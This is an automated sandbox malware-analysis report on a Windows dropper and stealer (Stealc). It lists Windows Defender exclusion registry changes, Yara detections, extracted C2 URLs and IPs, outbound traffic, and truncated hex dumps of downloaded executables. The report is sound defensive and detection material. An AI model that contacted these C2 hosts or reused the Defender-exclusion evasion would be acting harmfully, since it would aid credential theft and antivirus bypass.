Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: PE.pdb source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2181342436.00000000036B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: NjdbLPleIutA8FKI_S3fRztd.exe, 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: lisasoft.pdb source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1965969296.0000013417198000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{43CCD916-4698-4801-BF19-31680FA09FC1}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions Exclusions_Extensions			Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{43CCD916-4698-4801-BF19-31680FA09FC1}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions exe			Jump to behavior

Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Code function: 7_2_0040553A FindFirstFileA,		7_2_0040553A
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Code function: 7_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,		7_2_004055DE

Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe

Code function: 10_2_004A7829 GetLogicalDriveStringsW,DeleteVolumeMountPointW,GetCommandLineA,lstrcatW,InterlockedExchange,SetActiveWindow,TryEnterCriticalSection,WriteConsoleW,CopyRect,DebugActiveProcessStop,GetAtomNameW,GlobalDeleteAtom,GetTimeZoneInformation,GetComputerNameW,_memset,GetDefaultCommConfigA,DebugBreak,EnumDateFormatsA,LoadLibraryA,LoadLibraryA,LoadLibraryA,SetCommMask,GetTickCount,GetSystemTimes,FoldStringW,OpenWaitableTimerW,CreateWaitableTimerW,FormatMessageW,__vswprintf,_calloc,_printf,_calloc,_fgetpos,_calloc,LocalAlloc,LoadLibraryA,

10_2_004A7829

Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\__data__\	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	File opened: C:\Users\user\	Jump to behavior

Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	11_2_036DECE0
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	13_2_0584F518
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	14_2_055E0FC8
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	14_2_055E0FBC

Networking

Yara detected MSILDownloaderGeneric

Source: Yara match

File source: Process Memory Space: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe PID: 7008, type: MEMORYSTR

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://147.45.47.59/d6f30af05ffe50bf.php
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199751190313
Source: Malware configuration extractor	URLs: http://cajgtus.com/test1/get.php
Source: Malware configuration extractor	URLs: api.garageserviceoperation.com/CoreOPT/index.php
Source: Malware configuration extractor	URLs: 45.9.91.71:46967

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: es8d8QFs55NSPEWre6A8WVgP.exe.0.dr
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: gGYwIv9Yk9sB1abtIV19M1nc.exe.0.dr

Performs DNS queries to domains with low reputation

Source:

DNS query: service-domain.xyz

Yara detected Generic Downloader

Source: Yara match	File source: 14.0.HBnXrwXMNXUElNaizB6OqLMm.exe.630000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.Dc25WcfSyV8lvRa9ThM7DR04.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe PID: 7008, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\66b5b75106ac6_stealc[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\66b5ac1092454_otraba[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\66b5d9d3adbaa_defaultr[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe, type: DROPPED

Source: global traffic	TCP traffic: 192.168.2.4:49762 -> 45.9.91.71:46967
Source: global traffic	TCP traffic: 192.168.2.4:49771 -> 95.164.44.107:5000

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 10 Aug 2024 14:12:21 GMTContent-Type: application/octet-streamContent-Length: 964096Last-Modified: Thu, 08 Aug 2024 20:21:31 GMTConnection: keep-aliveETag: "66b528cb-eb600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e5 6e 7e 57 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 ae 0e 00 00 06 00 00 00 00 00 00 9e cc 0e 00 00 20 00 00 00 e0 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0f 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 cc 0e 00 4b 00 00 00 00 e0 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 ac 0e 00 00 20 00 00 00 ae 0e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 04 00 00 00 e0 0e 00 00 04 00 00 00 b0 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0f 00 00 02 00 00 00 b4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 cc 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 dc 85 0e 00 74 46 00 00 02 00 00 00 dd 00 00 06 f4 ac 00 00 e6 d8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b5 fd 00 00 4a cd 00 00 9f 1f 00 00 03 5f 00 00 b0 e9 00 00 ed a8 00 00 9b b9 00 00 ae 0a 00 00 45 a9 00 00 68 84 00 00 04 eb 00 00 e4 3d 00 00 16 31 00 00 34 25 00 00 62 89 00 00 fd fd 00 00 f6 90 00 00 14 18 00 00 ea bc 00 00 08 02 00 00 d0 ab 00 00 ca a2 00 00 66 69 00 00 49 68 00 00 48 6c 00 00 bd fe 00 00 28 de 00 00 cc 6f 00 00 62 e4 00 00 f7 41 00 00 63 69 00 00 8b 5b 00 00 4b bc 00 00 df d4 00 00 25 1b 00 00 19 bf 00 00 c5 24 00 00 e0 c9 00 00 8b 63 00 00 51 23 00 00 87 1b 00 00 c2 7c 00 00 88 69 00 00 ec e9 00 00 8c 87 00 00 60 82 00 00 86 25 00 00 a1 5d 00 00 8b d7 00 00 e3 dc 00 00 52 57 00 00 4f 98 00 00 31 a5 00 00 d1 5d 00 00 99 cb 00 00 eb 5a 00 00 e4 63 00 00 54 b7 00 00 ba f2 00 00 f1 ea 00 00 c4 ca 00 00 ce 49 00 00 4a 26 00 00 4d 67 00 00 05 1b 00 00 78 8f 00 00 97 81 00 00 36 5c 00 00 0e 0a 00 00 48 ca 00 00 37 d9 00 00 15 c7 00 00 88 b4 00 00 98 99 00 00 80 e6 00 00 0d 2f 00 00 41 39 00 00 78 7f 00 00 bb e0 00 00 e
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 10 Aug 2024 14:12:22 GMTContent-Type: application/octet-streamContent-Length: 529408Last-Modified: Fri, 09 Aug 2024 14:12:19 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66b623c3-81400"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 35 f1 4b b6 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 08 00 00 08 00 00 00 00 00 00 9a 67 03 00 00 20 00 00 00 40 08 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 08 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 67 03 00 4f 00 00 00 00 40 08 00 a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 0c 00 00 00 2c 67 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 07 08 00 00 20 00 00 00 08 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a0 03 00 00 00 40 08 00 00 04 00 00 00 0c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 08 00 00 04 00 00 00 10 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 10 Aug 2024 14:12:22 GMTContent-Type: application/octet-streamContent-Length: 746496Last-Modified: Sat, 03 Aug 2024 21:10:24 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ae9cc0-b6400"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0f dd a6 25 4b bc c8 76 4b bc c8 76 4b bc c8 76 f6 f3 5e 76 4a bc c8 76 55 ee 4c 76 55 bc c8 76 55 ee 5d 76 5b bc c8 76 55 ee 4b 76 2f bc c8 76 6c 7a b3 76 4e bc c8 76 4b bc c9 76 3e bc c8 76 55 ee 42 76 4a bc c8 76 55 ee 5c 76 4a bc c8 76 55 ee 59 76 4a bc c8 76 52 69 63 68 4b bc c8 76 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a6 d9 49 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6c 0a 00 00 08 02 00 00 00 00 00 75 14 00 00 00 10 00 00 00 80 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 0c 00 00 04 00 00 b2 5f 0c 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c 99 0a 00 3c 00 00 00 00 e0 0b 00 a0 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 94 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 37 6b 0a 00 00 10 00 00 00 6c 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 22 00 00 00 80 0a 00 00 24 00 00 00 70 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 28 23 01 00 00 b0 0a 00 00 1e 00 00 00 94 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a0 b0 00 00 00 e0 0b 00 00 b2 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 10 Aug 2024 14:12:22 GMTContent-Type: application/octet-streamContent-Length: 10590720Last-Modified: Thu, 08 Aug 2024 05:49:40 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66b45c74-a19a00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 18 5c b4 66 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 00 00 80 00 00 00 04 cd 00 00 00 00 00 4f 60 56 01 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 92 01 00 04 00 00 00 00 00 00 02 00 20 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 3d 57 01 3c 00 00 00 00 40 8f 01 d0 04 03 00 40 13 8f 01 60 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b9 5d 01 28 00 00 00 00 12 8f 01 38 01 00 00 00 00 00 00 00 00 00 00 00 a0 f0 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 7e 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f0 1d 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 e6 c9 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 80 01 00 00 00 a0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 10 00 00 00 00 b0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 10 00 00 00 00 c0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 30 00 00 53 c1 25 00 00 d0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 31 00 00 58 00 00 00 00 a0 f0 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 32 00 00 a0 8d 9e 00 00 b0 f0 00 00 8e 9e 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 d0 04 03 00 00 40 8f 01 00 06 03 00 00 94 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 10 Aug 2024 14:12:23 GMTContent-Type: application/octet-streamContent-Length: 6753792Last-Modified: Fri, 09 Aug 2024 05:41:36 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66b5ac10-670e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 fa a0 b5 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 70 64 00 00 9a 02 00 00 00 00 00 ae 8f 64 00 00 20 00 00 00 a0 64 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 67 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 8f 64 00 4b 00 00 00 00 c0 64 00 a8 93 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 67 00 0c 00 00 00 19 8f 64 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 6f 64 00 00 20 00 00 00 70 64 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 80 02 00 00 00 a0 64 00 00 04 00 00 00 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 93 02 00 00 c0 64 00 00 94 02 00 00 78 64 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 67 00 00 02 00 00 00 0c 67 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 